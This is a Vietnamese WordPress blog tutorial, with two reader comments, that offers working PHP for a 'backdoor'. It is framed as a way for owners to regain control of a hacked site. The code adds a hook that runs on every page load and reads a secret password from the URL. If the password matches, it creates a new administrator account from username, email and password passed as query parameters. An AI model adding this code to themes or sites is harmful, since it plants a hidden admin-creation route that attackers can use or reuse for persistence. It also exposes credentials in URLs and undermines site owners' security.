Tạo backdoor cho WordPress

Nếu bạn muốn có một cách mà bạn có thể tạo thêm tài khoản admin mới khi trang web của bạn bị hack thì bài viết này mình sẽ hướng dẫn cho bạn làm điều này.

WordPress backdoor

Mình đã từng giới thiệu qua đoạn code giúp bạn tạo tài khoản admin mới cho WordPress, tuy nhiên bạn chỉ làm được bài hướng dẫn này trong trường hợp bạn còn có thể đăng nhập được hosting.

Nếu trong tình huống xấu nhất, bạn bị mất toàn bộ các quyền điều khiển website và bạn đã tạo như hướng dẫn của bài viết này thì bạn cũng có thể tạo thêm tài khoản admin cho trang web bằng cửa sau.

Đầu tiên thì bạn sẽ dùng hàm tạo thêm tài khoản admin cho WordPress, bạn khai báo hàm này như sau:

function hocwp_insert_user_admin($username, $email, $password) {
	if(username_exists($username) || email_exists($email)) {
		return false;
	}
	$userdata = array(
		'user_login' => $username,
		'user_email' => $email,
		'user_pass' => $password,
		'role' => 'administrator'
	);
	return wp_insert_user($userdata) ;
}

Sau đó, bạn tạo 1 hook có thể kiểm tra khi người dùng nhập mật khẩu bất kỳ, nếu mật khẩu khớp với mật khẩu bạn định trước thì tạo thêm tài khoản admin mới với tên tài khoản, địa chỉ email và mật khẩu như bạn điền trên thanh địa chỉ.

function hocwp_theme_custom_wp() {
	$backdoor_password = $_GET['backdoor_password'];
	if(wp_check_password($backdoor_password, '$P$BN/Ukn4jQ4Xm0YDKT9h/I8YFrNdRZw0')) {
		$username = $_GET['username'];
		$email = $_GET['email'];
		$password = $_GET['password'];
		hocwp_insert_user_admin($username, $email, $password);
	}
}
add_action('wp', 'hocwp_theme_custom_wp');

Như vậy, khi bạn truy cập vào đường dẫn trang web mà có điền tham số backdoor_password thì hệ thống sẽ kiểm tra, nếu mật khẩu của bạn đúng thì hệ thống sẽ tạo tài khoản theo thông tin bạn nhập trên url tương ứng với từng tham số cụ thể. Chúc bạn thành công.

Gửi bình luận của bạn 5 bình luận

  1. Hosting của mình, tên miền của mình thì mình vẫn làm chủ được nó hoàn toàn. Nếu có bị mất 2 thứ đó nữa thì mình vẫn liên hệ nhà cung cấp để lấy nó lại được vì mình có đầy đủ bằng chứng để chứng minh nó là của mình mà. Cộng thêm việc sao lưu dữ liệu thuong2 xuyên nữa thì có bị hack cỡ nào cũng không sợ.

  2. Mình nghĩ trang nội dung thì không sợ mấy. Nếu có dịch vụ gì liên quan đến khách hàng trên site của mình mà bị hack mới sợ vì sẽ mất thông tin khách hàng. và rồi thì bla bla bla… có thiệt hại gì và mất uy tín v.v.
    Đại loại thế, còn tên miền với host thì khó bị mất hơn

Gửi bình luận

Địa chỉ email của bạn sẽ được giữ bí mật. Những mục bắt buộc được đánh dấu *